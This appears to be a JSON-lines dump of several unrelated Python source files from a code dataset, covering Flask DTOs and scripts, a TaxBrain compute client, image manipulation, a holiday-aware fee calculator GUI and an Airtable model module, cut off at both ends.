player_2_cards.append(player2.remove_card())\r\n","sub_path":"War.py","file_name":"War.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"29190749","text":"from flask_restx import Namespace, fields\n\nclass RequestDto:\n api = Namespace(\"request\", path=\"/request\")\n\n no_pattern = \"([1-9]|1[012])-([1-9]|([1-9][0-9]))+\"\n # date_pattern = \"(\\d{4}-\\d{2}-\\d{2} ([2][0-3]|[0-1][0-9]|[1-9]):[0-5][0-9]:([0-5][0-9]|[6][0]))\"\n date_pattern = \"\\d{4}-\\d{2}-\\d{2}\"\n photo_fn_pattern = \"(.*/)*.+\\.(png|jpg|jpeg|PNG|JPG|JPEG)\"\n id_pattern = \"[a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12}\"\n\n request = api.model(\"request\", {\n \"id\": fields.String(),\n \"no\": fields.String(required=True, pattern=no_pattern),\n \"date\": fields.String(dt_format=\"rfc822\", required=True, pattern=date_pattern),\n \"detail\": fields.String(),\n \"result\": fields.Integer(required=True, min=0, max=2),\n \"rating\": fields.Integer(required=True, min=0, max=5),\n \"photo_fn\": fields.String(required=True, pattern=photo_fn_pattern),\n \"client\": fields.Nested(\n api.model(\"client\", {\n \"id\": fields.String(required=True, attribute=\"client_id\", pattern=id_pattern),\n \"name\": fields.String(attribute=\"client_name\")\n }), required = True\n ),\n \"approach\": fields.Nested(\n api.model(\"approach\", {\n \"id\": fields.String(required=True, attribute=\"approach_id\", pattern=id_pattern),\n \"name\": fields.String(attribute=\"approach_name\")\n }), required = True\n ),\n \"type\": fields.Nested(\n api.model(\"type\", {\n \"id\": fields.String(required=True, attribute=\"type_id\", pattern=id_pattern),\n \"name\": fields.String(attribute=\"type_name\")\n }), required = True\n ),\n \"fixers\": fields.List(\n fields.Nested(\n api.model(\"fixer\", {\n \"id\": fields.String(required=True, attribute=\"fixer_id\", pattern=id_pattern),\n \"name\": fields.String(attribute=\"fixer_name\")\n }), required = True\n ), min_items = 1\n )\n })\n\nclass OfficeDto:\n api = Namespace(\"office\", path=\"/office\")\n\n hasText_pattern = \"(.|\\s)*\\S(.|\\s)*\"\n\n office = api.model(\"office\", {\n \"id\": fields.String(),\n \"name\": fields.String(required=True, pattern=hasText_pattern),\n \"total_requests\": fields.Integer()\n })\n\nclass ModeDto:\n api = Namespace(\"mode\", path=\"/mode\")\n\n hasText_pattern = \"(.|\\s)*\\S(.|\\s)*\"\n\n mode = api.model(\"mode\", {\n \"id\": fields.String(),\n \"name\": fields.String(required=True, pattern=hasText_pattern)\n })\n\nclass NatureDto:\n api = Namespace(\"nature\", path=\"/nature\")\n\n hasText_pattern = \"(.|\\s)*\\S(.|\\s)*\"\n\n nature = api.model(\"nature\", {\n \"id\": fields.String(),\n \"name\": fields.String(required=True, pattern=hasText_pattern),\n \"total_requests\": fields.Integer()\n })\n\nclass TechnicianDto:\n api = Namespace(\"technician\", path=\"/technician\")\n\n hasText_pattern = \"(.|\\s)*\\S(.|\\s)*\"\n\n technician = api.model(\"technician\", {\n \"id\": fields.String(),\n \"name\": fields.String(required=True, pattern=hasText_pattern),\n \"total_requests\": fields.Integer()\n })","sub_path":"app/server/utils/_dtos.py","file_name":"_dtos.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"285025214","text":"from PIL import Image\nimport sys\n\nimport numpy as np\n\n#b = np.array([[0, 1, 2], [3, 4, 5], [6, 7, 8]])\n#a = np.reshape(b,(3,3))\n#for i in a:\n# print (i)\n#print (a)\n\nimg = Image.new('RGB', (1920, 1080*2))\nimg1 = Image.open('photo/left.jpg')\nimg2 = Image.open('photo/right.jpg')\nimg.paste(img1, (0,1070))\nimg.paste(img2,(0,0))\n\n\nimg3 = img.crop((400,0, 1600, 1080*2))\n\n\n#img1 = Image.open(sys.argv[1])\nwidth, height = img1.size\nm = -0.5\nxshift = abs(m) * width\nnew_width = width + int(round(xshift))\nimg4 = img.transform((new_width, height), Image.AFFINE,\n (1, m, -xshift if m > 0 else 0, 0, 1, 0), Image.BICUBIC)\n#img.save(sys.argv[2]\n\nimg4.show()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"49884822","text":"import os\nimport json\nimport requests\nimport msgpack\nfrom requests.exceptions import RequestException, Timeout\nimport requests_mock\nimport taxcalc\nfrom .helpers import arrange_totals_by_row\n\nrequests_mock.Mocker.TEST_PREFIX = 'dropq'\n\nNUM_BUDGET_YEARS = int(os.environ.get('NUM_BUDGET_YEARS', 10))\nNUM_BUDGET_YEARS_QUICK = int(os.environ.get('NUM_BUDGET_YEARS_QUICK', 1))\nWORKER_HN = os.environ.get('DROPQ_WORKERS')\nDROPQ_URL = \"/dropq_start_job\"\n# URL to perform the dropq algorithm on a sample of the full dataset\nDROPQ_SMALL_URL = \"/dropq_small_start_job\"\nTIMEOUT_IN_SECONDS = 1.0\nMAX_ATTEMPTS_SUBMIT_JOB = 20\nBYTES_HEADER = {'Content-Type': 'application/octet-stream'}\n\nAGG_ROW_NAMES = taxcalc.tbi_utils.AGGR_ROW_NAMES\nGDP_ELAST_ROW_NAMES = taxcalc.tbi.GDP_ELAST_ROW_NAMES\n\n\nclass JobFailError(Exception):\n '''An Exception to raise when a remote jobs has failed'''\n\n\nclass DropqCompute(object):\n num_budget_years = NUM_BUDGET_YEARS\n\n def remote_submit_job(\n self,\n theurl,\n data,\n timeout=TIMEOUT_IN_SECONDS,\n headers=None):\n print(theurl, data)\n if headers is not None:\n response = requests.post(theurl,\n data=data,\n timeout=timeout,\n headers=headers)\n else:\n response = requests.post(theurl, data=data, timeout=timeout)\n return response\n\n def remote_results_ready(self, theurl, params):\n job_response = requests.get(theurl, params=params)\n return job_response\n\n def remote_retrieve_results(self, theurl, params):\n job_response = requests.get(theurl, params=params)\n return job_response\n\n def submit_calculation(self, data):\n url_template = \"http://{hn}\" + DROPQ_URL\n return self.submit(data, url_template)\n\n def submit_quick_calculation(self, data):\n url_template = \"http://{hn}\" + DROPQ_SMALL_URL\n return self.submit(data, url_template,\n increment_counter=False)\n\n def submit_elastic_calculation(self, data):\n url_template = \"http://{hn}/elastic_gdp_start_job\"\n return self.submit(data, url_template)\n\n def submit(self,\n data_list,\n url_template,\n increment_counter=True,\n use_wnc_offset=True):\n\n print(\"hostnames: \", WORKER_HN)\n print(\"submitting data: \", data_list)\n job_ids = []\n queue_length = 0\n for data in data_list:\n submitted = False\n attempts = 0\n while not submitted:\n packed = msgpack.dumps({'inputs': data}, use_bin_type=True)\n theurl = url_template.format(hn=WORKER_HN)\n try:\n response = self.remote_submit_job(\n theurl, data=packed, timeout=TIMEOUT_IN_SECONDS,\n headers=BYTES_HEADER)\n if response.status_code == 200:\n print(\"submitted: \", )\n submitted = True\n response_d = response.json()\n job_ids.append(response_d['job_id'])\n queue_length = response_d['qlength']\n else:\n print(\"FAILED: \", data, WORKER_HN)\n attempts += 1\n except Timeout:\n print(\"Couldn't submit to: \", WORKER_HN)\n attempts += 1\n except RequestException as re:\n print(\"Something unexpected happened: \", re)\n attempts += 1\n if attempts > MAX_ATTEMPTS_SUBMIT_JOB:\n print(\"Exceeded max attempts. Bailing out.\")\n raise IOError()\n\n return job_ids, queue_length\n\n def results_ready(self, job_ids):\n jobs_done = []\n for job_id in job_ids:\n result_url = \"http://{hn}/dropq_query_result\".format(hn=WORKER_HN)\n job_response = self.remote_results_ready(\n result_url, params={'job_id': job_id})\n msg = '{0} failed on host: {1}'.format(job_id, WORKER_HN)\n if job_response.status_code == 200: # Valid response\n jobs_done.append(job_response.text)\n else:\n print(\n 'did not expect response with status_code',\n job_response.status_code)\n raise JobFailError(msg)\n return jobs_done\n\n def _get_results_base(self, job_ids, job_failure=False):\n ans = []\n for job_id in job_ids:\n result_url = \"http://{hn}/dropq_get_result\".format(hn=WORKER_HN)\n job_response = self.remote_retrieve_results(\n result_url,\n params={'job_id': job_id}\n )\n if job_response.status_code == 200: # Valid response\n try:\n if job_failure:\n ans.append(job_response.text)\n else:\n ans.append(job_response.json())\n except ValueError:\n # Got back a bad response. Get the text and re-raise\n msg = 'PROBLEM WITH RESPONSE. TEXT RECEIVED: {}'\n raise ValueError(msg)\n return ans\n\n def get_results(self, job_ids, job_failure=False):\n if job_failure:\n return self._get_results_base(job_ids, job_failure=job_failure)\n\n ans = self._get_results_base(job_ids, job_failure=job_failure)\n\n names = [\n \"dist2_xdec\",\n \"dist1_xdec\",\n \"diff_itax_xdec\",\n \"diff_ptax_xdec\",\n \"diff_comb_xdec\",\n \"dist2_xbin\",\n \"dist1_xbin\",\n \"diff_itax_xbin\",\n \"diff_itax_xbin\",\n \"diff_ptax_xbin\",\n \"diff_comb_xbin\",\n \"aggr_d\",\n \"aggr_1\",\n \"aggr_2\"]\n results = {name: {} for name in names}\n\n for result in ans:\n for name in results:\n results[name].update(result[name])\n\n results['aggr_d'] = arrange_totals_by_row(results['aggr_d'],\n AGG_ROW_NAMES)\n\n results['aggr_1'] = arrange_totals_by_row(results['aggr_1'],\n AGG_ROW_NAMES)\n\n results['aggr_2'] = arrange_totals_by_row(results['aggr_2'],\n AGG_ROW_NAMES)\n\n return results\n\n\nclass MockCompute(DropqCompute):\n\n num_budget_years = NUM_BUDGET_YEARS\n __slots__ = ('count', 'num_times_to_wait', 'last_posted')\n\n def __init__(self, num_times_to_wait=0):\n self.count = 0\n # Number of times to respond 'No' before\n # replying that a job is ready\n self.num_times_to_wait = num_times_to_wait\n\n def remote_submit_job(self, theurl, data, timeout, headers=None):\n with requests_mock.Mocker() as mock:\n resp = {'job_id': '424242', 'qlength': 2}\n resp = json.dumps(resp)\n mock.register_uri('POST', DROPQ_URL, text=resp)\n mock.register_uri('POST', DROPQ_SMALL_URL, text=resp)\n mock.register_uri('POST', '/elastic_gdp_start_job', text=resp)\n mock.register_uri('POST', '/btax_start_job', text=resp)\n self.last_posted = data\n return DropqCompute.remote_submit_job(self, theurl, data, timeout)\n\n def remote_results_ready(self, theurl, params):\n with requests_mock.Mocker() as mock:\n if self.num_times_to_wait > 0:\n mock.register_uri('GET', '/dropq_query_result', text='NO')\n self.num_times_to_wait -= 1\n else:\n mock.register_uri('GET', '/dropq_query_result', text='YES')\n return DropqCompute.remote_results_ready(self, theurl, params)\n\n def remote_retrieve_results(self, theurl, params):\n mock_path = os.path.join(os.path.split(__file__)[0], \"tests\",\n \"response_year_{0}.json\")\n with open(mock_path.format(self.count), 'r') as f:\n text = f.read()\n self.count += 1\n with requests_mock.Mocker() as mock:\n mock.register_uri('GET', '/dropq_get_result', text=text)\n return DropqCompute.remote_retrieve_results(self, theurl, params)\n\n def reset_count(self):\n \"\"\"\n reset worker node count\n \"\"\"\n self.count = 0\n\n\nclass ElasticMockCompute(MockCompute):\n\n def remote_retrieve_results(self, theurl, params):\n self.count += 1\n text = ('{\"elasticity_gdp\": {\"gdp_elasticity_1\": \"0.00310\"}, '\n '\"dropq_version\": \"0.6.a96303\", \"taxcalc_version\": '\n '\"0.6.10d462\"}')\n with requests_mock.Mocker() as mock:\n mock.register_uri('GET', '/dropq_get_result', text=text)\n return DropqCompute.remote_retrieve_results(self, theurl, params)\n\n\nclass MockFailedCompute(MockCompute):\n\n def remote_results_ready(self, theurl, params):\n print('MockFailedCompute remote_results_ready', theurl, params)\n with requests_mock.Mocker() as mock:\n mock.register_uri('GET', '/dropq_query_result', text='FAIL')\n return DropqCompute.remote_results_ready(self, theurl, params)\n\n\nclass MockFailedComputeOnOldHost(MockCompute):\n \"\"\"\n Simulate requesting results from a host IP that is no longer used. This\n action should raise a `ConnectionError`\n \"\"\"\n\n def remote_results_ready(self, theurl, params):\n print('MockFailedComputeOnOldHost remote_results_ready',\n theurl, params)\n raise requests.ConnectionError()\n\n\nclass NodeDownCompute(MockCompute):\n\n __slots__ = ('count', 'num_times_to_wait', 'switch')\n\n def __init__(self, **kwargs):\n if 'switch' in kwargs:\n self.switch = kwargs['switch']\n del kwargs['switch']\n else:\n self.switch = 0\n self.count = 0\n self.num_times_to_wait = 0\n super(MockCompute, self).__init__(**kwargs)\n\n def remote_submit_job(self, theurl, data, timeout, headers=None):\n with requests_mock.Mocker() as mock:\n resp = {'job_id': '424242', 'qlength': 2}\n resp = json.dumps(resp)\n if (self.switch % 2 == 0):\n mock.register_uri('POST', DROPQ_URL, status_code=502)\n mock.register_uri(\n 'POST',\n '/elastic_gdp_start_job',\n status_code=502)\n mock.register_uri('POST', '/btax_start_job', status_code=502)\n else:\n mock.register_uri('POST', DROPQ_URL, text=resp)\n mock.register_uri('POST', '/elastic_gdp_start_job', text=resp)\n mock.register_uri('POST', '/btax_start_job', text=resp)\n self.switch += 1\n self.last_posted = data\n return DropqCompute.remote_submit_job(self, theurl, data, timeout)\n","sub_path":"webapp/apps/taxbrain/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":11090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"489770443","text":"from flask_script import Manager\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask import json\nfrom bs4 import BeautifulSoup\nfrom sqlalchemy import create_engine\nfrom models import Lecture, Exercise, Timestamp, GitUser, GitRepo, LocalUser\nimport requests\nfrom config import ProductionConfig\nfrom datetime import datetime, time\nfrom data import parse_data\n\nfrom models import db\nfrom app import app\n\nmigrate = Migrate(app, db)\nmanager = Manager(app)\n\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef get_all_lectures():\n\n response = requests.get('http://curric.rithmschool.com/r13/lectures/')\n soup = BeautifulSoup(response.text)\n links = []\n\n # Drop current lecture table\n engine = create_engine(ProductionConfig.SQLALCHEMY_DATABASE_URI)\n Lecture.__table__.drop(engine)\n db.create_all()\n\n for link in soup.find_all('a'):\n links.append(link.get('href'))\n\n for link in links:\n if 'zip' in link:\n continue\n response = requests.get(\n 'http://curric.rithmschool.com/r13/lectures/' + link)\n soup = BeautifulSoup(response.text)\n if (soup.title is None):\n continue\n if (soup.title.string == 'Rithm Curriculum'):\n continue\n else:\n new_lecture = Lecture(\n title=link,\n url='http://curric.rithmschool.com/r13/lectures/' + link)\n db.session.add(new_lecture)\n\n db.session.commit()\n\n\n@manager.command\ndef get_all_exercises():\n\n response = requests.get('http://curric.rithmschool.com/r13/exercises/')\n soup = BeautifulSoup(response.text)\n links = []\n\n # Drop Exercise table\n engine = create_engine(ProductionConfig.SQLALCHEMY_DATABASE_URI)\n Exercise.__table__.drop(engine)\n db.create_all()\n\n # Set up current exercises to test for duplicates\n current_exercises = []\n for exercise in Exercise.query.all():\n current_exercises.append(exercise.title)\n\n # Search soup for links\n for link in soup.find_all('a'):\n links.append(link.get('href'))\n\n for link in links:\n if 'zip' in link:\n continue\n\n response = requests.get(\n 'http://curric.rithmschool.com/r13/exercises/' + link)\n soup = BeautifulSoup(response.text)\n if (soup.title is None):\n continue\n if (soup.title.string == 'Rithm Curriculum'):\n continue\n else:\n new_exercise = Exercise(\n title=link,\n url='http://curric.rithmschool.com/r13/exercises/' + link)\n db.session.add(new_exercise)\n\n db.session.commit()\n\n\n@manager.command\ndef update_repos():\n current_time = datetime.now()\n new_time = (current_time.strftime(\"%c\"))\n\n # Drop tables\n engine = create_engine(ProductionConfig.SQLALCHEMY_DATABASE_URI)\n GitRepo.__table__.drop(engine)\n GitUser.__table__.drop(engine)\n\n db.create_all()\n\n # Update users\n users = LocalUser.query.all()\n timezone = {'Time-Zone': 'PST8PDT'}\n for user in users:\n username = user.localuser\n git_data = requests.get(\n f'https://api.github.com/users/{username}/events?per_page=100',\n params=timezone)\n content = git_data.content\n parsed_json = json.loads(content)\n parse_data(parsed_json)\n\n # Timestamp update\n engine = create_engine(ProductionConfig.SQLALCHEMY_DATABASE_URI)\n Timestamp.__table__.drop(engine)\n db.create_all()\n\n new_timestamp = Timestamp(time=new_time)\n\n db.session.add(new_timestamp)\n db.session.commit()\n\n\nif __name__ == '__main__':\n manager.run()\n\n # # Set up current exercises to test for duplicates\n # current_exercises = []\n # for exercise in Exercise.query.all():\n # current_exercises.append(exercise.title)\n\n # for link in soup.find_all('a'):\n # links.append('https://curric.rithmschool.com/r13/exercises/' +\n # link.get('href'))\n\n # for link in links:\n # if 'zip' in link:\n # continue\n # response = requests.get(link)\n # soup = BeautifulSoup(response.text)\n # if (soup.title is None):\n # continue\n # else:\n # if soup.title.string in current_exercises:\n # continue\n # else:\n # new_exercise = Exercise(title=soup.title.string, url=link)\n # db.session.add(new_exercise)","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"606376477","text":"# encoding: utf-8\nfrom uuid import uuid4\nfrom datetime import datetime\nfrom test.json_utils import list_to_json\n\nclass BaseModel(object):\n \"\"\"Base class\"\"\"\n # 1:enabled 0:disabled\n status_ = ''\n created_time = ''\n creater =''\n modified_time = ''\n modifier = ''\n\n def __init__(self,status_ ,created_time,creater,modified_time,modifier):\n self.status_ =status_\n self.created_time = created_time\n self.creater = creater\n self.modified_time = modified_time\n self.modifier = modifier\n\nclass Comment(BaseModel):\n \"\"\"Represents Proected comments.\"\"\"\n\n id = ''\n name = ''\n text = ''\n date = ''\n\n def __init__(self,name,text,date,status_ ,created_time,creater,modified_time,modifier):\n super(Comment,self).__init__(status_ ,created_time,creater,modified_time,modifier)\n self.id =uuid4()\n self.name = name\n self.text = text\n self.date = date\n\n\ncomm1=Comment(name='zhangsan',\n text='1233frkfrfmrf',\n date=datetime.now(),\n status_='1',\n created_time=datetime.now(),\n creater ='null',\n modified_time=datetime.now(),\n modifier ='null')\n\ncomm2=Comment(name='test',\n text='6666666',\n date=datetime.now(),\n status_='0',\n created_time=datetime.now(),\n creater ='est',\n modified_time=datetime.now(),\n modifier ='tt')\nobjs=[]\nobjs.append(comm1)\nobjs.append(comm2)\n#print(dir(comm1))\nprint(list_to_json(objs))\n\n","sub_path":"test/test_to_json.py","file_name":"test_to_json.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"142488050","text":"# -*- coding:utf-8 -*-\n# Author: washing\n# DateTime: 2022/3/22 9:15\n# File: 2038.py\n# Desc: \n\nclass Solution:\n def winnerOfGame(self, colors: str) -> bool:\n dic = {'A': 0, 'B': 0}\n this = \"\"\n counter = 0\n colors += \"C\"\n for i in colors:\n if this == i: counter += 1\n else:\n if counter >= 3: dic[this] += counter-2\n counter = 1\n this = i\n return dic['A'] > dic['B']\n","sub_path":"Solutions/2038/2038.py","file_name":"2038.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"580514349","text":"import pandas as pd\nfrom pandas.tseries.holiday import *\nfrom pandas.tseries.offsets import CustomBusinessDay\n\nclass FrenchBusinessCalendar(AbstractHolidayCalendar):\n rules = [\n Holiday('New Years Day', month=1, day=1),\n EasterMonday,\n Holiday('Labour Day', month=5, day=1),\n Holiday('Victory in Europe Day', month=5, day=8),\n Holiday('Ascension Day', month=1, day=1, offset=[Easter(), Day(39)]),\n Holiday('Bastille Day', month=7, day=14),\n Holiday('Assumption of Mary to Heaven', month=8, day=15),\n Holiday('All Saints Day', month=11, day=1),\n Holiday('Armistice Day', month=11, day=11),\n Holiday('Christmas Day', month=12, day=25)\n ]\n\nFrench_BD = CustomBusinessDay(calendar=FrenchBusinessCalendar())\ns = pd.date_range('2016-12-29', end='2021-01-03', freq=French_BD)\ndf = pd.DataFrame(s, columns=['Date'])\n\n# Define fares depending on day time\nnormal_dict = {'day_first_hour_fare':'42',\n 'night_first_hour_fare':'49.50',\n 'day_subsequent_hour_fare': '30',\n 'night_subsequent_hour_fare': '37.50'\n }\n\nholiday_dict = {'day_first_hour_fare':'49.50',\n 'night_first_hour_fare':'57',\n 'day_subsequent_hour_fare':'37.50',\n 'night_subsequent_hour_fare':'45'\n\n}\n\n\ndef calculate_honorary(start_date, end_date, normal_dict, holiday_dict):\n \"\"\"\n Calculate the honorary for worked hours based on following rules\n\n params: start_date (str), start date in format '%Y-%m-%d-H:M:S'\n params: end_date (str), end date in format '%Y-%m-%d-H:M:S'\n params: normal_dict (dict), business day fare dictionnary\n params: holiday_dict (dict), holiday day fare dictionnary\n\n #### Payment Rules\n\n day is between 0700 and 2200\n night is between 2200 and 0700\n\n normal day fare:\n * first hour = 42 euros\n * subsequent hour = 30 euros\n\n normal night fare\n * first hour = 49.50 euros\n * subsequent hour = 37.50 euros\n\n holiday fare:\n * first hour = 49.50 euros\n * subsequent hour = 37.50 euros\n\n holiday fare\n * first hour = 57 euros\n * subsequent hour = 45 euros\n \"\"\"\n\n # Transform dates to Timestamps\n start_date = pd.Timestamp(start_date)\n end_date = pd.Timestamp(end_date)\n\n print('Start date: ' + str(start_date))\n print('End date: ' + str(end_date))\n print(' ')\n # Get number of hours worked\n number_hours_worked = int(pd.Timedelta(end_date - start_date, unit='h') / timedelta(hours=1))\n if number_hours_worked < 0:\n raise ValueError(\"End date happened before start date\")\n else:\n main_mess = 'You have worked ' + str(number_hours_worked) + ' hours.'\n print(main_mess)\n\n # Get actual hours relative to the day\n worked_hours = pd.Series(pd.date_range(start_date, end_date, freq='H').hour)\n worked_dates = pd.Series(pd.date_range(start_date, end_date, freq='H').date)\n\n # Get whether these hours were day or night shift\n ## Day is defined between 0700 and 2200\n bins = [0, 7, 22, 24]\n # I add a third night label that I rename later on. Suboptimal\n labels = ['Night', 'Day', 'Night1']\n # Compute shifts\n shift = pd.cut(worked_hours[1:], bins=bins, labels=labels, include_lowest=True, right=True).replace('Night1',\n 'Night')\n # Concatenate data\n hours_per_shift = (pd\n .DataFrame(pd.concat([worked_dates, worked_hours, shift], axis=1))\n .rename(columns={0: 'date', 1: 'hour', 2: 'shifts'}))\n # Shift the shifts column to get correct number of hours per shift per day\n hours_per_shift.shifts = hours_per_shift.shifts.shift(-1)\n # Groupby and count the number of hours\n # Fill NaN with 0 hours worked\n hours_per_shift = hours_per_shift.groupby(['date', 'shifts']).count().fillna(0)\n print(hours_per_shift)\n print(' ')\n # Verify whether start date is holiday\n if (df.Date.astype(str).str.contains(start_date.strftime('%Y-%m-%d')).sum()) > 0:\n # Day in calendar, so not holiday\n start_holiday = False\n fare_dict_start = normal_dict\n start_date_mess = 'Start date is business day.'\n print(start_date_mess)\n else:\n # Day not in calendar, so holiday\n start_holiday = True\n fare_dict_start = holiday_dict\n start_date_mess = 'Start date is weekend or holiday'\n print(start_date_mess)\n if df.Date.astype(str).str.contains(end_date.strftime('%Y-%m-%d')).sum() > 0:\n # Day in calendar, so not holiday\n end_holiday = False\n fare_dict_end = normal_dict\n end_date_mess = 'End date is business day.'\n print(end_date_mess)\n else:\n # Day not in calendar, so holiday\n end_holiday = True\n fare_dict_end = holiday_dict\n end_date_mess = 'End date is weekend or holiday.'\n print(end_date_mess)\n\n # Calculate fee\n\n print('')\n\n if start_date.date() == end_date.date(): # if mission was on one day only\n print('Mission was on one single day')\n # Set end date as no gain\n honorary_end_date = 0\n # Get first day data\n day_one = hours_per_shift.reset_index().loc[hours_per_shift.reset_index()['date'] == start_date]\n if shift.iloc[0] == 'Day':\n honorary_start_date = (float(fare_dict_start.get(\"day_first_hour_fare\"))\n + float((day_one.loc[day_one.shifts == 'Day'].hour - 1)\n * float(fare_dict_start.get(\"day_subsequent_hour_fare\")))\n + float((day_one.loc[day_one.shifts == 'Night'].hour)\n * float(fare_dict_start.get(\"night_subsequent_hour_fare\"))))\n else:\n honorary_start_date = (float(fare_dict.get(\"night_first_hour_fare\"))\n + float((day_one.loc[day_one.shifts == 'Night'].hour - 1)\n * float(fare_dict_start.get(\"night_subsequent_hour_fare\")))\n + float((day_one.loc[day_one.shifts == 'Day'].hour)\n * float(fare_dict_start.get(\"day_subsequent_hour_fare\"))))\n\n else: # if mission was on two consecutive days\n print('Mission was on two consecutive days')\n print('')\n day_one = hours_per_shift.reset_index().loc[hours_per_shift.reset_index()['date'] == start_date]\n day_two = hours_per_shift.reset_index().loc[hours_per_shift.reset_index()['date'] == end_date]\n if shift.iloc[0] == 'Day':\n print('First hour is day shift')\n # Honorary Start Date\n honorary_start_date = (float(fare_dict_start.get(\"day_first_hour_fare\"))\n + float((day_one.loc[day_one.shifts == 'Day'].hour - 1)\n * float(fare_dict_start.get(\"day_subsequent_hour_fare\")))\n + float((day_one.loc[day_one.shifts == 'Night'].hour)\n * float(fare_dict_start.get(\"night_subsequent_hour_fare\"))))\n # Honorary End Date\n honorary_end_date = (\n + float((day_two.loc[day_two.shifts == 'Night'].hour)\n * float(fare_dict_end.get(\"night_subsequent_hour_fare\")))\n + float((day_two.loc[day_two.shifts == 'Day'].hour)\n * float(fare_dict_end.get(\"day_subsequent_hour_fare\"))))\n else:\n print('First hour isnight shift')\n # Honorary Start Date\n honorary_start_date = (float(fare_dict_start.get(\"night_first_hour_fare\"))\n + float((day_one.loc[day_one.shifts == 'Night'].hour - 1)\n * float(fare_dict_start.get(\"night_subsequent_hour_fare\")))\n + float((day_one.loc[day_one.shifts == 'Day'].hour)\n * float(fare_dict_start.get(\"day_subsequent_hour_fare\"))))\n # Honorary End Date\n honorary_end_date = (\n + float((day_two.loc[day_two.shifts == 'Night'].hour)\n * float(fare_dict_end.get(\"night_subsequent_hour_fare\")))\n + float((day_two.loc[day_two.shifts == 'Day'].hour)\n * float(fare_dict_end.get(\"day_subsequent_hour_fare\"))))\n\n honorary_total = int(honorary_start_date + honorary_end_date)\n\n print(' ')\n honorary_mess = 'You are owed ' + str(honorary_total) + ' euros.'\n print(honorary_mess)\n\n return ('Start date: ' + str(start_date) + ' '\n + 'End date: ' + str(end_date) + ' '\n + start_date_mess + ' '\n + end_date_mess + ' '\n + main_mess + ' '\n + honorary_mess)\n\n# Output actual GUI\n\nfrom tkinter import *\nfrom tkcalendar import *\nfrom tkinter import messagebox\n\nroot = Tk()\nroot.title(\"Honorary Calculator\")\n\n#frame_start_date = LabelFrame(root, text='Start Date (Y-M-D)',padx=10,pady=10)\n#frame_start_date.grid(row=0,column=0,padx=10,pady=10)\n\ncal_start_date = Calendar(root, selectmode=\"day\",year=2020, month=6, day=1)\ncal_start_date.grid(row=1,column=0,padx=10,pady=10)\n\nframe_start_hour = LabelFrame(root, text='Start Hour(Hour from 0 to 24)',padx=10,pady=10)\nframe_start_hour.grid(row=0,column=0,padx=10,pady=10)\n\n#frame_end_date = LabelFrame(root, text='End Date (Y-M-D)',padx=10,pady=10)\n#frame_end_date.grid(row=0,column=1,padx=10,pady=10)\n\ncal_end_date = Calendar(root, selectmode=\"day\",year=2020, month=6, day=1)\ncal_end_date.grid(row=1,column=1,padx=10,pady=10)\n\nframe_end_hour = LabelFrame(root, text='End Hour (Hour from 0 to 24)',padx=10,pady=10)\nframe_end_hour.grid(row=0,column=1,padx=10,pady=10)\n\n#e_start_date = Entry(cal_start_date,width=35,bg=\"black\", fg='white', borderwidth=5)\n#_end_date = Entry(frame_end_date,width=35,bg=\"black\", fg='white', borderwidth=5)\ne_start_hour = Entry(frame_start_hour,width=35,bg=\"black\", fg='white', borderwidth=5)\ne_end_hour = Entry(frame_end_hour,width=35,bg=\"black\", fg='white', borderwidth=5)\n\n#e_start_date.grid(row=0,column=0)\n#e_end_date.grid(row=0,column=1)\ne_start_hour.grid(row=1,column=0)\ne_end_hour.grid(row=1,column=1)\n\ndef popup():\n messagebox.showinfo('Honorary Results', calculate_honorary(start_date=str(cal_start_date.get_date()) + ' '+ str(e_start_hour.get()+':00:00'),\n end_date=str(cal_end_date.get_date()) + ' ' + str(e_end_hour.get()+':00:00'),\n normal_dict=normal_dict,\n holiday_dict=holiday_dict)\n )\n\n# Define Buttons\n\nbutton_confirm = Button(root, text=\"Calculate!\", padx=40, pady=20, command=popup)\n\n\n# Put the buttons on screen\n\nbutton_confirm.grid(row=2, column=0, columnspan=3)\n\nbutton_quit = Button(root, text = 'Exit Calculator', command=root.quit)\nbutton_quit.grid(row=3, column=0, columnspan=3)\n\nroot.mainloop()\n","sub_path":"src/honorary_gui/honorary_calc_message.py","file_name":"honorary_calc_message.py","file_ext":"py","file_size_in_byte":11422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"451992291","text":"\"\"\"Tools for interacting with airtable\n\nIncludes:\n- Base models, for creating classes from airtable records\n- \"Meta\" base models\n + Track the record's status field\n + Additional JSON metadata for the automation\n- Table specs for associating models, table names, and misc\n- A table poller for executing callbacks on status changes\n\n\"\"\"\n\nimport abc\nimport datetime\nimport logging\nfrom typing import Callable, Dict, Optional, Set, Type\n\nimport pydantic\n\nfrom airtable import Airtable as _AirtableClient\n\nfrom .. import config\n\nlogger = logging.getLogger(__name__)\n\n\n##########\n# CONSTS #\n##########\n\nDEFAULT_POLL_TABLE_MAX_NUM_RETRIES = 3\n\n\n###############\n# BASE MODELS #\n###############\n\n\n# TODO : consider not allowing users change the id field\nclass BaseModel(pydantic.BaseModel, abc.ABC):\n id: str\n created_at: datetime.datetime\n\n class Config:\n allow_population_by_field_name = True\n\n @classmethod\n def from_airtable(cls, raw_dict):\n return cls(\n id=raw_dict[\"id\"],\n created_at=raw_dict[\"createdTime\"],\n **raw_dict[\"fields\"],\n )\n\n def to_airtable(self):\n fields = self.dict(by_alias=True, exclude_none=True)\n 